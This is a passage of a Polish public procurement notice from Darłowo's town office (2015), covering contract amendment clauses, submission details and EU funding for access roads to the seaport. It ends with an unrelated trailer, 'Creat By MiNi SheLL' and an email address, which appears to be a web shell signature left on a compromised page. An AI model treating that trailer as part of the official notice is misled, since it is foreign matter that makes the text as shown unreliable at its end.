- wystąpienie niekorzystnych warunków gruntowych (np. wysoki poziom wód gruntowych) uniemożliwiających wykonywanie robót, zarówno istniejących przed podpisaniem umowy, a nieznanych stronom, jak i takich, które mogą wystąpić po podpisaniu umowy,
- wystąpienie okoliczności prawno - budowlanych wymagających wstrzymania robót,
- przekształcenie lub zmiana siedziby którejkolwiek ze stron umowy,
- zmiana osób reprezentujących strony oraz innych osób z nazwiska wymienionych 
w umowie,
- zmiany przepisów dot. obowiązujących stawek podatku VAT.
W sytuacjach określonych powyżej Strony, mając na uwadze poszanowanie wzajemnych interesów, zasady równości Stron oraz ekwiwalentności świadczeń i przede wszystkim zgodny zamiar wykonania Przedmiotu Umowy, określą w niezbędnym zakresie wpływ powyższych okoliczności na dotychczasowe prawa i obowiązki. 
2. 	Niezależnie od postanowień wymienionych powyżej, Strony dopuszczają możliwość 
zmian korzystnych z punktu widzenia realizacji Przedmiotu Umowy, w szczególności przyspieszających realizację, obniżających koszt ponoszony przez Zamawiającego na wykonanie, utrzymanie lub użytkowanie Przedmiotu Umowy bądź zwiększających użyteczność Przedmiotu Umowy. 
W takiej sytuacji, Strony wprowadzą do Umowy stosowne zmiany weryfikujące redakcyjne dotychczasowe brzmienie umowy bądź wskazujące nowe dane wynikające ze zmian 
w rejestrach publicznych albo też, kierując się poszanowaniem wzajemnych interesów, zasadą równości Stron oraz ekwiwalentności świadczeń i przede wszystkim zgodnym zamiarem wykonania Przedmiotu Umowy, określą zmiany korzystne z punktu widzenia realizacji Przedmiotu Umowy. 
3.	Wszelkie zmiany wprowadzane do Umowy dokonywane będą z poszanowaniem obowiązków wynikających z obowiązującego prawa, w tym w szczególności art. 140 ust. 3 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (tekst jednolity Dz. U. z 2013 r., poz. 907, z póżn. zm.) oraz zasad ogólnych rządzących tą ustawą.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.darlowo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Darłowie, Plac Tadeusza Kościuszki 9, 76-150 Darłowo, pok. Nr 19.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.06.2015 godzina 10:30, miejsce: Urząd Miejski w Darłowie, Plac Tadeusza Kościuszki 9, 76-150 Darłowo, pok. Nr 19, Sekretariat - pok. Nr 21.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie dotyczy realizacji projektu pod nazwą Poprawa dostępności do portu morskiego w Darłowie z sieci dróg krajowych i wojewódzkich poprzez budowę dróg dojazdowych w ramach Programu operacyjnego INFRASTRUKTURA I ŚRODOWISKO; PRIORYTET: VII Transport przyjazny środowisku; DZIAŁANIE: 7.2. Rozwój transportu morskiego. Numer projektu: 7.2-21.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com